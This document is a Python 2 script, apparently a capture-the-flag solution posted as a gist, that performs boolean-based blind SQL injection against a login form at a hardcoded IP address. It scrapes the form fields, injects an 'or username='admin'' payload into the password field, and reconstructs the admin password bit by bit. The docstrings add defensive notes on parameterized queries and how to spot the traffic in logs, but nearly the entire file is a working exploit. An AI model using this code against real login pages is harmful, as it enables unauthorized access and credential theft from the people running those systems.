@D3AdCa7
Created April 13, 2014 22:19
import re,json,urllib,urllib2,cookielib
# Python 2 script (urllib2/cookielib, print statements).  One global cookie
# jar is installed as the default opener so any cookie the server sets is
# carried across every urllib2.urlopen() call below -- the GET of the form and
# the POSTs in submit() all run inside the same server-side session.
cj = cookielib.CookieJar()
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)))
def submit(password,username='blahblah'):
    """Post one login attempt and report whether the admin greeting came back.

    Fetches the login page over plain HTTP, scrapes the form's ``action`` and
    the ``name`` attribute of the text and password inputs (findall returns
    (id, name) tuples, hence ``[0][1]``), then POSTs ``username``/``password``
    to the form action.  The caller learns exactly one bit: whether the
    ``product-header`` h4 in the response equals the fixed greeting string.

    Every ``re.findall(...)[0]`` raises IndexError when the pattern does not
    match, so a changed page layout or an error page surfaces as an
    exception rather than as False.  The ``action="(.+)" `` pattern is
    greedy and can capture past the attribute if another ``" `` follows on
    the same line -- it happens to work for this page only.
    """
    page = urllib2.urlopen('http://54.204.80.192/example').read()
    action = re.findall(r'action="(.+)" ',page)[0]
    user_field = re.findall(r'input type="text" id="(.+)" name="(.+)"',page)[0][1]
    pass_field = re.findall(r'input type="password" id="(.+)" name="(.+)"',page)[0][1]
    data = {user_field: username, pass_field: password}
    data = urllib.urlencode(data)
    # Credential material travels in the POST body in the clear (http://).
    cont = urllib2.urlopen('http://54.204.80.192' + action,data).read()
    return re.findall(r'h4 class="product-header">(.+)</h4>',cont)[0] == 'Hello, admin!! My password is the flag!'
def get_bool( expression ):
    """Use the login form as a one-bit oracle: True iff ``expression`` = 1 server-side.

    The value sent in the *password* field closes the quoted string the
    server presumably splices it into, appends
    ``or username='admin' and <expression> = 1`` and re-opens the quote so
    the remainder of the original statement still parses.  submit() then
    reports only whether the admin greeting appeared, so each request leaks
    exactly the truth value of ``expression`` -- the boolean-based blind
    SQL-injection pattern.  The oracle exists solely because the login
    handler concatenates the submitted value into SQL; a parameterized
    query removes it entirely.  Server-side this looks like a burst of
    logins from a single session whose password field carries SQL
    fragments, one bit per request, which is the signal worth alerting on.
    """
    result = submit(" ' or username='admin' and %s = 1 and ''=' " % expression)
    print 'Result:', result
    return result
def get_bit( expression ):
    """Return the oracle's answer for ``expression`` as the character '1' or '0'."""
    return '1' if get_bool( expression ) else '0'
from itertools import count
def get_string( expression ):
    """Recover the string value of SQL ``expression`` one bit at a time.

    For byte position ``i`` (1-based, as substr() counts) the eight bits are
    queried most-significant first (``range(8)[::-1]`` is 7..0), concatenated
    into a binary string and converted with ``int(..., 2)``.  That is eight
    round trips per byte -- a 20-character value costs about 160 login
    attempts, which is why this traffic is easy to pick out of access logs.
    The loop stops at the first byte that reads back as 0; past the end of
    the value substr() presumably yields '' / NULL whose ascii() compares as
    0 (DB-specific, not checked here).  Progress is printed per bit; the
    trailing comma on the first print is the Python 2 "no newline" idiom.
    """
    result = ''
    for i in count( start=1 ):
        char = ''
        for j in range(8)[::-1]:
            print 'Byte %d, Bit %d,' % (i,j),
            # Shift bit j of the i-th byte's ASCII code down and mask it; the
            # oracle reports whether that single bit is set.
            bit = get_bit( 'ascii(substr(%s,%d,1))>>%d&1' % ( expression, i, j ) )
            print bit
            char += bit
        char = int( char, 2 )  # ``char`` is reused: bit string -> int code
        if char == 0: break
        result += chr(char)
        print '----------'
        print result
        print '----------'
    return result
# Entry point.  'password' is interpolated into the injected SQL, so it is a
# column name rather than a literal -- given the ``username='admin'`` clause
# in get_bool(), presumably the admin row's password column.
print get_string('password')